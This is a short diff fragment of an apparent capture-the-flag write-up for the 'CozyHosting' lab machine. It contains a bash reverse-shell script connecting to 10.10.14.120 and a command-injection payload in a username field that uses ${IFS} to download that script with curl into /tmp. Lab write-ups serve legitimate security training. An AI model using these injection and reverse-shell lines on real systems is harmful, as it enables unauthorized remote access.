HoDHoDx2/HoDHoDx2.github.io/_posts/2026-08-22-CozyHosting.md

 #!/bin/bash
 bash -i >& /dev/tcp/10.10.14.120/1222 0>&1
 ```

-The current working directory had no write permissions, so I dropped the file into `/tmp` instead:
+Hosting it with `python3` server at port `111`and trying to write it to the current working directory but `app` user had no write permissions, so I dropped the file into `/tmp` instead:

 ```
 username=;curl${IFS}http://10.10.14.120:111/rev.sh${IFS}-o${IFS}/tmp/rev.sh;